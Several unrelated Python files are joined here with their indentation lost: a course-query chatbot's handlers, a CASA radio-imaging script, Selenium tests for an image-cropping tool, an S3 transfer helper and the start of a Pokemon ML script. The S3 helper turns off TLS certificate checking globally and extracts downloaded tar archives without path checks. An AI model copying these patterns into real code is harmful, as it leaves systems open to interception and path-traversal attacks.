return f"Yes, {course.full_name()} is an elective."
else:
return f"No, {course.full_name()} is not an elective."
def handler_electives_offered_current(self, params: QueryParameters) -> str:
results = self.datastore.get_electives_by_quarter(True)
classes = []
for result in results:
classes.append("STAT " + str(result))
if len(classes) > 1:
classes[-1] = "and " + str(classes[-1])
if len(classes) == 0:
return f"Sorry, there are no electives offered this quarter."
else:
return f"{', '.join(classes)} are all the electives this quarter."
def handler_electives_offered_next(self, params: QueryParameters) -> str:
results = self.datastore.get_electives_by_quarter(False)
classes = []
for result in results:
classes.append("STAT " + str(result))
if len(classes) > 1:
classes[-1] = "and " + str(classes[-1])
if len(classes) == 0:
return f"Sorry, there are no electives offered next quarter."
else:
return f"{', '.join(classes)} are all the electives offered next quarter."
def handler_description_of_course(self, params: QueryParameters) -> str: #TODO: Make sure response sounds natural
params.require_class_id()
course = self.get_course(params.class_id)
return f"{course.full_name()} is about {course.about}."
def handler_find_course_about_topic(self, params: QueryParameters) -> str: #TODO: Improve response message
params.require_topic()
courses = self.datastore.get_courses_about_topic(params.topic)
classes = []
for course in courses:
classes.append(course.full_name())
if len(classes) > 2:
classes[-1] = "and " + str(classes[-1])
if len(classes) == 0:
return f"Sorry, there aren't any courses about {params.topic}"
elif len(classes) == 1:
return f"{', '.join(classes)} is about {params.topic}."
elif len(classes) == 2:
return f"{classes[0] + ' and ' + classes[1]} are about {params.topic}."
else:
return f"{', '.join(classes)} are about {params.topic}."
def handler_times_course_offered_current(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
if len(sections) == 0:
return f"Sorry, there are no sections of STAT {params.class_id} this quarter."
times = []
for section in sections:
if len(section.times_offered) > 0:
times.append(section.times_offered)
if len(times) > 2:
times[-1] = "and " + str(times[-1])
if len(times) == 0:
return f"Sorry, {sections[0].full_name()} isn't offered synchronously this quarter. "
elif len(times) == 2:
return f"{sections[0].full_name()} is offered at {times[0] + ' and ' + times[1]} each week this quarter."
else:
return f"{sections[0].full_name()} is offered at {', '.join(times)} each week this quarter."
def handler_times_course_offered_next(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
if len(sections) == 0:
return f"Sorry, there are no sections of STAT {params.class_id} next quarter."
times = []
for section in sections:
if len(section.times_offered) > 0:
times.append(section.times_offered)
if len(times) > 2:
times[-1] = "and " + str(times[-1])
if len(times) == 0:
return f"Sorry, {sections[0].full_name()} isn't offered synchronously next quarter. "
elif len(times) == 2:
return f"{sections[0].full_name()} is offered at {times[0] + ' and ' + times[1]} each week next quarter."
else:
return f"{sections[0].full_name()} is offered at {', '.join(times)} each week next quarter."
def handler_hours_of_course(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
return f"{course.full_name()} meets for {course.units} hours a week."
def handler_title_of_course(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
return f"The title of {course.full_name()} is {course.title}."
def handler_course_id_of_course(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
return f"The class number of {course.full_name()} is {course.id}."
def handler_level_of_course(self, params: QueryParameters) -> str: #TODO: Verify works correctly
params.require_class_id()
course = self.get_course(params.class_id)
return f"The level of {course.full_name()} is {str(course.id)[0]}00"
def handler_enrollment_cap_of_course_current(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
cap = 0
for section in sections:
cap += section.enrollment_cap
return f"The enrollment cap for {sections[0].full_name()} this quarter is {cap}."
def handler_enrollment_cap_of_course_next(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
cap = 0
for section in sections:
cap += section.enrollment_cap
return f"The enrollment cap for {sections[0].full_name()} next quarter is {cap}."
def missing_information_response(self, intent: Intent, params: QueryParameters, missing_value: str):
'''special handler for when an intent was determined, but the required parameters were missing'''
return "Sorry, Looks like I'm confused, or your query is missing information. Try Rephrasing."
#Extraneous methods
def get_course(self, class_id: int) -> Course:
'''This is the prefered method to get a course object. It handles the case of
an invalid course id'''
course = self.datastore.get_course_from_id(class_id)
if course is None:
raise InvalidCourseException(str(class_id))
return course
def invalid_course_message(self, class_id):
return f"I'm sorry, It appears that STAT {class_id} is not a valid class."
def is_signaling_exit(self, message):
'''returns true if message intends to end the program'''
message = message.strip().lower()
if message in ('quit', 'bye', 'exit', 'q'):
return True
return False
def get_exit_phrase(self):
return "Bye"
def get_error_message(self):
return "Sorry, something went wrong."
|
line_vis = vis = '16B-202.sb32532587.eb32875589.57663.07622001157.ms'
imagename = myimagebase = output = 'J1922+1530_spw40'
if not os.path.exists(imagename+".image.pbcor.fits"):
os.system('rm -rf ' + output + '*/')
tclean(vis=line_vis,
imagename=imagename,
field='J1922+1530',
spw='40',
weighting='briggs',
robust=0.0,
imsize=[512,512],
cell=['0.01 arcsec'],
threshold='50 mJy',
niter=1000,
gridder='mosaic',
specmode='mfs',
outframe='LSRK',
savemodel='modelcolumn',
selectdata=True)
impbcor(imagename=myimagebase+'.image', pbimage=myimagebase+'.pb', outfile=myimagebase+'.image.pbcor', overwrite=True)
exportfits(imagename=myimagebase+'.image.pbcor', fitsimage=myimagebase+'.image.pbcor.fits', overwrite=True, dropdeg=True)
exportfits(imagename=myimagebase+'.pb', fitsimage=myimagebase+'.pb.fits', overwrite=True, dropdeg=True)
exportfits(imagename=myimagebase+'.residual', fitsimage=myimagebase+'.residual.fits', overwrite=True, dropdeg=True)
imagename = myimagebase = output = 'J1922+1530_allspw'
if not os.path.exists(imagename+".image.pbcor.fits"):
os.system('rm -rf ' + output + '*/')
tclean(vis=line_vis,
imagename=imagename,
field='J1922+1530',
spw='',
weighting='briggs',
robust=0.0,
imsize=[512,512],
cell=['0.01 arcsec'],
threshold='50 mJy',
niter=1000,
gridder='mosaic',
specmode='mfs',
outframe='LSRK',
savemodel='modelcolumn',
selectdata=True)
impbcor(imagename=myimagebase+'.image', pbimage=myimagebase+'.pb', outfile=myimagebase+'.image.pbcor', overwrite=True)
exportfits(imagename=myimagebase+'.image.pbcor', fitsimage=myimagebase+'.image.pbcor.fits', overwrite=True, dropdeg=True)
exportfits(imagename=myimagebase+'.pb', fitsimage=myimagebase+'.pb.fits', overwrite=True, dropdeg=True)
exportfits(imagename=myimagebase+'.residual', fitsimage=myimagebase+'.residual.fits', overwrite=True, dropdeg=True)
os.system('rm -rf J1922+1530_selfcal_phase.cal')
gaincal(vis=vis, caltable="J1922+1530_selfcal_phase.cal", field="J1922+1530",
solint='int', calmode="p", refant="", gaintype="G")
plotcal(caltable="J1922+1530_selfcal_phase.cal",
xaxis="time", yaxis="phase", subplot=331,
iteration="antenna", plotrange=[0,0,-30,30], markersize=5,
fontsize=10.0,)
plotcal(caltable="J1922+1530_selfcal_phase.cal",
xaxis="time", yaxis="phase", subplot=331,
iteration="antenna", plotrange=[0,0,-30,30], markersize=5,
fontsize=10.0, spw='40')
applycal(vis=full_vis,
field=phasecal,
gaintable=['cal_all_spws.gaincurve','cal_all_spws.K0',
'cal_all_spws.B0_nopoly','cal_all_spws.G1inf','cal_all_spws.G2',
'cal_all_spws.F3inc', 'J1922+1530_selfcal_phase.cal'],
gainfield=['',phasecal,phasecal,phasecal,phasecal,phasecal,phasecal,phasecal],
interp=['','','nearest','nearest','linearPD,linear','linearPD,linear','','linearPD,linear'],
#spwmap=[[], [], [], spwmap, spwmap, spwmap, []],
parang=False,calwt=False)
#only do this after sanity-checking...
# applycal(vis=full_vis,field=source,
# gaintable=['cal_all_spws.gaincurve','cal_all_spws.K0',
# 'cal_all_spws.B0_nopoly','cal_all_spws.G1inf','cal_all_spws.G2',
# 'cal_all_spws.F3inc', 'J1922+1530_selfcal_phase.cal'],
# gainfield=['',phasecal,phasecal,phasecal,phasecal,phasecal,phasecal,phasecal],
# interp=['','','nearest','nearest','linearPD,linear','linearPD,linear','','linearPD,linear'],
# #spwmap=[[], [], [], spwmap, spwmap, spwmap, []],
# parang=False,calwt=False)
|
# coding: utf8
from selenium.webdriver.common.keys import Keys
import gocept.httpserverlayer.wsgi
import gocept.selenium
import unittest
import zeit.cms.testing
import zeit.content.image.testing
import zeit.imp.tests
WSGI_LAYER = zeit.cms.testing.WSGILayer(
name='WSGILayer', bases=(zeit.imp.tests.imp_layer,))
HTTP_LAYER = gocept.httpserverlayer.wsgi.Layer(
name='HTTPLayer', bases=(WSGI_LAYER,))
WD_LAYER = gocept.selenium.WebdriverLayer(
name='WebdriverLayer', bases=(HTTP_LAYER,))
WEBDRIVER_LAYER = gocept.selenium.WebdriverSeleneseLayer(
name='WebdriverSeleneseLayer', bases=(WD_LAYER,))
class Selenium(zeit.cms.testing.SeleniumTestCase):
layer = WEBDRIVER_LAYER
window_width = 1100
window_height = 600
def setUp(self):
super(Selenium, self).setUp()
self.create_group()
self.open_imp()
def create_group(self):
zeit.content.image.testing.create_image_group_with_master_image()
def open_imp(self):
self.open('/repository/group/@@imp.html')
class SeleniumBasicTests(Selenium):
def test_generic_load(self):
self.selenium.assertTextPresent(u'450×200')
def test_crop_mask(self):
s = self.selenium
# s.comment('After clicking on the mask choice the image is loaded')
self.click_label(u"450×200")
s.verifyAttribute(
'id=imp-mask-image@src',
'*&mask_width=450&mask_height=200&border=')
# s.comment('The border will be passed')
self.click_label("grauer Rahmen")
s.verifyAttribute(
'id=imp-mask-image@src',
'*&mask_width=450&mask_height=200&border=%23888888')
def test_border_select_wo_selected_mask_does_not_fail(self):
s = self.selenium
self.click_label("schwarzer Rahmen")
s.verifyElementNotPresent('id=imp-mask-image')
self.click_label(u"450×200")
s.verifyAttribute(
'id=imp-mask-image@src',
'*&mask_width=450&mask_height=200&border=%23000000')
def test_image_dragging(self):
s = self.selenium
pos = self.eval('window.document.imp.get_image_position()')
self.assertEqual(1, pos['x'])
self.assertEqual(1, pos['y'])
s.pause(500) # XXX What should we be waiting for here?
s.dragAndDrop('id=imp-mask', '30,100')
pos = self.eval('window.document.imp.get_image_position()')
self.assertEqual(31, pos['x'])
self.assertEqual(101, pos['y'])
def test_mask_string_parse(self):
s = self.selenium
# s.comment('Simple dimensions')
s.runScript(
'window.document.imp.set_mask("500x200/500/200")')
s.verifyEval('window.document.imp.mask_dimensions.w', '500')
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
s.verifyEval('window.document.imp.name', '"500x200"')
# s.comment('The dimensions can be variable, indicated by a ?')
s.runScript(
'window.document.imp.set_mask("art-200/?500/200")')
s.verifyEval('window.document.imp.mask_dimensions.w', '500')
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
s.verifyEval('window.document.imp.mask_variable.w', 'true')
s.verifyEval('window.document.imp.mask_variable.h', 'false')
s.verifyEval('window.document.imp.name', '"art-200"')
s.runScript('window.document.imp.set_mask("foo/?500/?200")')
s.verifyEval('window.document.imp.mask_dimensions.w', '500')
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
s.verifyEval('window.document.imp.mask_variable.w', 'true')
s.verifyEval('window.document.imp.mask_variable.h', 'true')
s.verifyEval('window.document.imp.name', '"foo"')
def test_zoom_slider(self):
s = self.selenium
# s.comment('Zooming works with a slider')
s.verifyEval('window.document.imp.zoom>1', 'false')
s.clickAt('id=imp-zoom-slider', '500,0')
s.waitForEval('window.document.imp.zoom>1', 'true')
def test_zoom_mouse_wheel(self):
zoom = float(self.eval('window.document.imp.zoom.toPrecision(3)'))
self.zoom_with_wheel(10000)
self.assertGreater(self.eval('window.document.imp.zoom'), 1)
self.zoom_with_wheel(-9000)
self.assertLess(self.eval('window.document.imp.zoom'), 1)
self.assertGreater(self.eval('window.document.imp.zoom'), zoom)
def test_zoom_with_mouse_wheel_updates_slider(self):
s = self.selenium
s.verifyEval('window.document.imp_zoom_slider.get_value()>1', 'false')
self.zoom_with_wheel(10000)
s.verifyEval('window.document.imp_zoom_slider.get_value()>1', 'true')
def zoom_with_wheel(self, delta_y):
self.selenium.runScript("""\
var evt = window.document.createEvent('MouseEvents')
evt.initEvent('DOMMouseScroll', false, false)
evt.wheelDeltaX = 0;
evt.wheelDeltaY = %s;
window.document.getElementById('imp-mask').dispatchEvent(evt)
""" % delta_y)
class SeleniumCropTests(Selenium):
def test_crop_wo_mask(self):
s = self.selenium
s.verifyElementNotPresent('css=#imp-image-bar > div')
# s.comment('Nothing happens when the crop button is clicked.')
s.click('crop')
s.verifyElementNotPresent('css=#imp-image-bar > div')
def test_crop(self):
s = self.selenium
s.verifyElementNotPresent('css=#imp-image-bar > div')
s.verifyElementNotPresent('css=label.cropped')
s.dragAndDrop('id=imp-mask', '-30,-100')
self.click_label(u"450×200")
s.click('crop')
# s.comment('After cropping the image is inserted in the image bar')
s.waitForElementPresent('css=#imp-image-bar > div')
# s.comment('The label is marked as "cropped"')
s.verifyElementPresent('css=label.cropped')
def test_crop_outside_mask(self):
# Since VIV-500 we need to trouble ourselves a bit to produce such a
# scenario: Zoom in, drag it off-center, zoom out again. As the center
# is somewhat preserved by zooming operations, the image will be moved
# outside the mask afterwards.
s = self.selenium
s.verifyElementNotPresent('css=#imp-image-bar > div')
s.verifyElementNotPresent('css=label.cropped')
self.click_label(u"140×140")
s.clickAt('id=imp-zoom-slider', '500,0')
s.dragAndDrop('id=imp-mask', '+500,+500')
s.clickAt('id=imp-zoom-slider', '1,0')
s.click('crop')
s.verifyAlert('Das Bild ist nicht*')
s.verifyElementNotPresent('css=#imp-image-bar > div')
def test_drag_outside_mask_snaps_to_mask(self):
# As it snaps to the mask we can crop the image and no alert is
# generated.
s = self.selenium
self.click_label(u"450×200")
s.dragAndDrop('id=imp-mask', '+1000,+1000')
s.click('crop')
s.waitForElementPresent('css=#imp-image-bar > div')
def test_zoom_slider_has_minimum_of_mask_size(self):
s = self.selenium
# Put the zoom slider somewhere else than the minimum,
self.click_label(u"450×200")
s.clickAt('id=imp-zoom-slider', '500,0')
# then select another mask
self.click_label(u"140×140")
# Assert that the slider is at the minimum value
self.wait_for_condition(
'window.jQuery("#imp-zoom-slider div").position().left == 0')
zoom = self.eval('document.imp_zoom_slider.get_value()')
self.assertTrue(str(zoom).startswith('0.09'))
class SeleniumMaskTests(Selenium):
def test_input_fields_show_mask_size(self):
s = self.selenium
self.click_label(u"450×200")
s.verifyValue('mask-w', '450')
s.verifyValue('mask-h', '200')
self.click_label(u"210×210")
s.verifyValue('mask-w', '210')
s.verifyValue('mask-h', '210')
def test_input_fields_disabled_for_fixed_mask(self):
s = self.selenium
self.click_label(u"450×200")
form = "window.document.getElementById('imp-configuration-form')"
s.verifyEval("%s['mask-w'].disabled" % form, 'true')
s.verifyEval("%s['mask-h'].disabled" % form, 'true')
def test_input_fields_initally_disabled(self):
s = self.selenium
form = "window.document.getElementById('imp-configuration-form')"
s.verifyEval("%s['mask-w'].disabled" % form, 'true')
s.verifyEval("%s['mask-h'].disabled" % form, 'true')
def test_input_field_enabled_for_variable_mask(self):
s = self.selenium
self.click_label("Artikelbild breit")
form = "window.document.getElementById('imp-configuration-form')"
s.verifyEval("%s['mask-w'].disabled" % form, 'true')
s.verifyEval("%s['mask-h'].disabled" % form, 'false')
def test_input_field_changes_are_reflected_in_the_mask(self):
s = self.selenium
self.click_label("Artikelbild breit")
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
for i in range(3):
s.type('mask-h', Keys.BACKSPACE)
s.type('mask-h', '280\n')
s.verifyEval('window.document.imp.mask_dimensions.h', '280')
def test_input_field_up_arrow_once_increases_by_1(self):
self.verify_press(Keys.ARROW_UP, '201')
def test_input_field_down_arrow_once_decreases_by_1(self):
self.verify_press(Keys.ARROW_DOWN, '199')
def test_input_field_left_arrow_once_decreases_by_1(self):
self.verify_press(Keys.ARROW_LEFT, '199')
def test_input_field_right_arrow_once_increases_by_1(self):
self.verify_press(Keys.ARROW_RIGHT, '201')
def verify_press(self, key_code, expected_value):
s = self.selenium
self.click_label("Artikelbild breit")
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
s.keyDown('mask-h', key_code)
# XXX selenium.webdriver implements both keyDown and keyUp as
# "sendKeys", which results in two presses, sigh.
# s.keyUp('mask-h', key_code)
s.verifyEval('window.document.imp.mask_dimensions.h', expected_value)
@unittest.skip('python webdriver bindings cannot hold down keys')
def test_input_field_up_arrow_hold_increases(self):
self.verify_hold(Keys.ARROW_UP, '>210')
@unittest.skip('python webdriver bindings cannot hold down keys')
def test_input_field_down_arrow_hold_decreases(self):
self.verify_hold(Keys.ARROW_DOWN, '<190')
@unittest.skip('python webdriver bindings cannot hold down keys')
def test_input_field_left_arrow_hold_decreases(self):
self.verify_hold(Keys.ARROW_LEFT, '<190')
@unittest.skip('python webdriver bindings cannot hold down keys')
def test_input_field_right_arrow_hold_increases(self):
self.verify_hold(Keys.ARROW_RIGHT, '>210')
def verify_hold(self, key_code, expected_value):
s = self.selenium
self.click_label("Artikelbild breit")
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
s.keyDown('mask-h', key_code)
s.pause(5000)
s.keyUp('mask-h', key_code)
s.verifyEval(
'window.document.imp.mask_dimensions.h %s' % expected_value,
'true')
def test_mask_select_should_fit_image_into_mask_x(self):
s = self.selenium
self.click_label('Artikelbild breit')
s.verifyEval('window.document.imp.mask_dimensions.w', '410')
s.verifyEval('window.document.imp.mask_dimensions.h', '200')
# X fits
s.verifyEval('window.document.imp.get_crop_arguments().x1', '0')
s.verifyEval('window.document.imp.get_crop_arguments().x2', '410')
# Y is aligned middle
y1 = s.getEval('window.document.imp.get_crop_arguments().y1')
y2 = s.getEval('window.document.imp.get_crop_arguments().y2')
self.assertIn(y1, ('53', '54')) # Rounding issues
self.assertIn(y2, ('253', '254')) # Rounding issues
def test_mask_select_should_fit_image_into_mask_y(self):
s = self.selenium
self.click_label('Audio')
s.verifyEval('window.document.imp.mask_dimensions.w', '180')
s.verifyEval('window.document.imp.mask_dimensions.h', '180')
# X is aligned centered
s.verifyEval('window.document.imp.get_crop_arguments().x1', '30')
s.verifyEval('window.document.imp.get_crop_arguments().x2', '210')
# Y fits
s.verifyEval('window.document.imp.get_crop_arguments().y1', '0')
s.verifyEval('window.document.imp.get_crop_arguments().y2', '180')
class ResizeTests(Selenium):
window_width = 1000
window_height = 800
def setUp(self):
super(ResizeTests, self).setUp()
# Choose a mask
self.click_label(u"450×200")
def test_window_resize_updates_mask(self):
s = self.selenium
# Store the current mask image dimensions
width = int(s.getEval('window.document.imp.mask_image_dimensions.w'))
height = int(s.getEval('window.document.imp.mask_image_dimensions.h'))
# Increase the window width affects mask, try width only first:
s.setWindowSize(1200, 800)
s.waitForEval(
"window.document.imp.mask_image_dimensions.w > %d" % width,
'true')
self.assertEqual(
height,
int(s.getEval("window.document.imp.mask_image_dimensions.h")))
# change width and height:
s.setWindowSize(800, 900)
s.pause(100)
s.waitForEval(
"window.document.imp.mask_image_dimensions.w < %d" % width,
'true')
self.assertTrue(
int(s.getEval("window.document.imp.mask_image_dimensions.h"))
> height)
def test_window_resize_moves_image(self):
# When the area changes it's size the crop area remains centered. This
# means we must move the image to not change the current view. That
# means that after changing the size, the crop parameters remain the
# same.
s = self.selenium
get_crop_args = ('window.MochiKit.Base.serializeJSON('
' window.document.imp.get_crop_arguments())')
crop_args = self.eval(get_crop_args)
s.setWindowSize(900, 900)
s.pause(500)
self.assertEqual(crop_args, self.eval(get_crop_args))
# Try another one, to be sure this works multiple times
s.setWindowSize(1000, 800)
s.pause(500)
self.assertEqual(crop_args, self.eval(get_crop_args))
def test_window_resize_updates_zoom_slider(self):
# The zoom slider doesn't automatically support size updates.
s = self.selenium
max_left = s.getEval(
'window.document.imp_zoom_slider.zoom_slider._maxLeft')
s.setWindowSize(800, 900)
s.waitForEval(
'window.document.imp_zoom_slider.zoom_slider._maxLeft < %s' %
max_left, 'true')
def test_sidebar_switch_sends_resize_event(self):
# The sidebar can be switched on/off. This obiously doesn't send an
# onresize event to the window. We must support this nevertheless.
s = self.selenium
max_left = s.getEval(
'window.document.imp_zoom_slider.zoom_slider._maxLeft')
s.click('id=sidebar-dragger')
s.pause(50)
s.waitForEval(
'window.document.imp_zoom_slider.zoom_slider._maxLeft > %s' %
max_left, 'true')
# Clicking again resets to the original state
s.click('id=sidebar-dragger')
s.pause(50)
s.waitForEval(
'window.document.imp_zoom_slider.zoom_slider._maxLeft == %s' %
max_left, 'true')
class FilterTests(Selenium):
def test_value_mapper(self):
s = self.selenium
def verify_mappers(step, value, filter):
s.waitForNotEval(
'typeof(window.document.imp_color_filter)', 'undefined')
s.verifyEval(
'window.document.imp_color_filter.to_value(%s)' % step,
str(value))
s.verifyEval(
'window.document.imp_color_filter.to_step(%s)' % value,
str(step))
s.verifyEval(
'window.document.imp_color_filter.to_filter(%s)' % value,
str(filter))
verify_mappers(0, -100, 0.75)
verify_mappers(600, -40, 0.9)
verify_mappers(1000, 0, 1)
verify_mappers(1800, 80, 2)
verify_mappers(2000, 100, 2.25)
def test_brightness_slider(self):
self.verify_slider('brightness')
@unittest.skip('No idea why this slider does not move on click')
def test_contrast_slider(self):
self.verify_slider('contrast')
@unittest.skip('No idea why this slider does not move on click')
def test_color_slider(self):
self.verify_slider('color')
def test_sharpness_slider(self):
self.verify_slider('sharpness')
def verify_slider(self, name):
s = self.selenium
selector = 'css=*[id="filter.%s"] .uislider' % name
s.waitForElementPresent(selector)
# Clicking 0 yields 0.75 as value and changes the image url
image_url = s.getEval('window.document.imp.image.src')
s.clickAt(selector, '1,0')
s.verifyValue('filter.%s.input' % name, '-100')
s.verifyEval(
"window.document.imp.crop_arguments['filter.%s']" % name, '0.75')
s.waitForEval(
"window.document.imp.image.src == '%s'" % image_url, 'false')
# Clicking > 0 increases the value:
s.clickAt(selector, '100,0')
s.verifyEval(
"new Number(window.document.getElementById("
" 'filter.%s.input').value) > -100" % name,
'true')
s.verifyEval(
"window.document.imp.crop_arguments['filter.%s'] != 0" % name,
'true')
# clicking reset sets the slider back to 0 (filter becomes 1 then)
s.click('reset')
s.verifyEval(
"window.document.imp.crop_arguments['filter.%s']" % name, '1')
class ContentZoomTest(Selenium):
def test_zoom(self):
s = self.selenium
s.verifyElementNotPresent('css=#content.imp-zoomed-content')
s.click('id=imp-content-zoom-toggle')
s.verifyElementPresent('css=#content.imp-zoomed-content')
s.click('id=imp-content-zoom-toggle')
s.verifyElementNotPresent('css=#content.imp-zoomed-content')
|
import boto3
from botocore.client import Config
from boto3.s3.transfer import TransferConfig
import os
import tarfile
import shutil
import wget
import ssl
from pathlib import Path
ssl._create_default_https_context = ssl._create_unverified_context
def soft_connection(func):
"""
Decorator that catch intermittent disconnection with S3
"""
def try_connect(*args, **kwargs):
try:
result = func(*args, **kwargs)
except Exception as e:
print("S3 UPLOAD FAILURE", e)
result = None
return result
return try_connect
class S3Handler:
def __init__(self, endpoint_url, aws_access_key_id,
aws_secret_access_key, signature_version,
region_name, s3bucket,
s3_data_folder,
s3_model_folder,
exp_name='NO_NAMED_EXPERIMENT',
upload_multi_part=False,
training=False,
cert_path=None):
if upload_multi_part:
self.config = TransferConfig(max_concurrency=5)
else:
GB = 1024 ** 3
self.config = TransferConfig(multipart_threshold=20*GB)
if cert_path:
if not os.path.exists(cert_path):
wget.download(cert_path)
cert_path = Path(cert_path).name
self.s3 = boto3.client('s3',
endpoint_url=endpoint_url,
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
config=Config(signature_version=signature_version),
region_name=region_name,
verify=cert_path)
else:
self.s3 = boto3.client('s3',
endpoint_url=endpoint_url,
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
config=Config(signature_version=signature_version),
region_name=region_name)
self.exp_name = exp_name
self.training = training
if self.exp_name == 'NO_NAMED_EXPERIMENT' and self.training:
print('WARNING: EXP_NAME NOT IN YAML')
self.bucket = s3bucket
self.data_folder = s3_data_folder
self.model_folder = s3_model_folder
def download_file(self, localfile, bucket=None, s3path=None, output_dir='/workspace'):
bucket = bucket if bucket else self.bucket
if s3path == 'model':
s3path = self.model_folder
if s3path == 'data':
s3path = self.data_folder
print("S3 Download s3://" + bucket + "/" + s3path + localfile + " to " + os.path.join(output_dir, localfile))
self.s3.download_file(bucket, os.path.join(s3path, localfile), os.path.join(output_dir, localfile))
def download_all_files_with_ext(self, bucket=None, s3path=None, ext=['.pth', '.log', '.json', '.0'], output_dir='ai_plat_output/'):
bucket = bucket if bucket else self.bucket
if s3path == 'model':
s3path = self.model_folder
if s3path == 'data':
s3path = self.data_folder
response = self.s3.list_objects_v2(Bucket=bucket, Prefix=s3path, Delimiter='/')
print (f"SCANNING {s3path}")
if 'Contents' not in response:
print ("No items inside")
else:
for item in response['Contents']:
print (os.path.splitext(item['Key']))
if os.path.splitext(item['Key'])[-1] in ext:
_, localfile = os.path.split(item['Key'])
os.makedirs(output_dir, exist_ok=True)
self.download_file(localfile=localfile, bucket=bucket, s3path=s3path, output_dir=output_dir)
@soft_connection
def upload_file(self, localfile, bucket=None, s3path=None, file_tail=False):
"""
:param localfile: the file to be uploaded
:param bucket: use S3Handler bucket unless stated otherwise
:param s3path: use S3Handler s3path unless stated otherwise
:param file_tail: remove directory overheads like "/workspace/abcdefg/file_name" to "file_name"
"""
if file_tail:
head, output_file = os.path.split(localfile)
else:
output_file = localfile
bucket = bucket if bucket else self.bucket
if s3path == 'model':
s3path = self.model_folder
if s3path == 'data':
s3path = self.data_folder
if self.training:
output_file = os.path.join(self.exp_name, output_file)
print("S3 Uploading " + localfile + " to s3://" + bucket + '/' + s3path + '/' + output_file)
self.s3.upload_file(localfile, bucket, os.path.join(s3path, output_file), Config=self.config)
def upload_folder(self, folder, bucket=None, s3path=None, file_tail=False, accepted_ext=None):
"""
uses self.upload_file to upload_folder
:param folder: the folder to be uploaded
:param bucket: use S3Handler bucket unless stated otherwise
:param s3path: use S3Handler s3path unless stated otherwise
:param file_tail: remove directory overheads like "/workspace/abcdefg/file_name" to "file_name"
:param accepted_ext: upload only files with this LIST of extensions
"""
def _splitext(file):
for ext in ['.tar.gz', '.tar.bz2']:
if file.endswith(ext):
return file[:-len(ext)], file[-len(ext):]
return os.path.splitext(file)
from glob import glob
print("Processing folder")
for file in glob(folder + "/**/*", recursive=True):
if not (os.path.isdir(file)):
if accepted_ext is not None:
_, file_ext = _splitext(file)
if file_ext not in accepted_ext:
print(f"Rejecting {file}")
continue
print(f"Processing {file}")
self.upload_file(bucket=bucket, localfile=file, s3path=s3path, file_tail=file_tail)
def upload_model_folder(self, bucket=None, s3path=None):
# [model_paths, clearml args]
output_dir = ['/workspace/output/faster_rcnn_RoITrans_r50_fpn_1x_dota1_5/',
'/workspace/outputs/']
for folder in output_dir:
s3path = os.path.join('training_classification_output', self.exp_name)
self.upload_folder(folder, bucket, s3path, file_tail=True)
def print_folders(self, bucket=None, prefix=['data/', 'model/', 'training_classification_output/']):
bucket = bucket if bucket else self.bucket
for index_prefix in prefix:
response = self.s3.list_objects_v2(Bucket=bucket, Prefix=index_prefix, Delimiter='/')
print (f"SCANNING {index_prefix}")
if 'Contents' not in response:
if 'CommonPrefixes' in response:
prefix_list = [item['Prefix'] for item in response['CommonPrefixes']]
for prefix in prefix_list:
print (prefix)
response = self.s3.list_objects_v2(Bucket=bucket, Prefix=prefix, Delimiter='/')
if 'Contents' in response:
for item in response['Contents']:
print (item['Key'])
else:
print (f"No items inside in {index_prefix}")
else:
for item in response['Contents']:
print (item['Key'])
print ("Common Prefixes: ")
response = self.s3.list_objects_v2(Bucket=bucket, Delimiter='/')
for prefix in response['CommonPrefixes']:
print (prefix['Prefix'])
def delete_file(self, filename, bucket=None):
bucket = bucket if bucket else self.bucket
response = self.s3.list_objects_v2(Bucket=bucket, Prefix='/', Delimiter='/')
if 'Contents' not in response:
print ("No items inside")
else:
for dict_obj in response['Contents']:
item = dict_obj['Key']
head, output_file = os.path.split(item)
if output_file == filename:
print(f"Deleting {item}")
print (self.s3.delete_object(Bucket=bucket, Key=item))
def delete_trained_folder(self, bucket=None, s3path='/', ext=['.pth', '.log', '.json', '.0']):
bucket = bucket if bucket else self.bucket
response = self.s3.list_objects_v2(Bucket=bucket, Prefix=s3path, Delimiter='/')
if 'Contents' not in response:
print ("No items inside")
else:
for dict_obj in response['Contents']:
item = dict_obj['Key']
_, file_ext = os.path.splitext(item)
head, output_file = os.path.split(item)
if file_ext in ext:
print(f"Deleting {item}")
print (self.s3.delete_object(Bucket=bucket, Key=item))
def download_batch_data(self, folders, bucket=None, s3_folder='data', val_folders=None):
if type(folders) == str:
folders = folders.split(',')
if val_folders:
if type(val_folders) == str:
val_folders = val_folders.split(',')
folders = folders.copy()
folders.extend(val_folders.copy())
downloaded_batch = []
for video_dir in folders:
directory = video_dir.split('/')[0]
if directory not in downloaded_batch:
tar_file = directory + '.tar.gz'
self.download_file(localfile=tar_file, bucket=bucket, s3path=s3_folder)
with tarfile.open(os.path.join('/workspace', tar_file), "r:gz") as tarObj:
tarObj.extractall('/workspace/')
downloaded_batch.append(directory)
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 12:54:31 2020
@author: KReuZ_o13
"""
#setup thy packages
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib as plt
import sklearn as sn #python ML package
from tensorflow import keras
from sklearn import preprocessing
#let's read the file using pandas
#for Windows users: forward slash not backslash
df = pd.read_csv('C:/Users/ADMIN1/Desktop/Projects/Python Projects/Machine_Learning/pokemon.csv')
#so, what columns do we have? run in console
df.columns
#the data we want to work with are these columns!
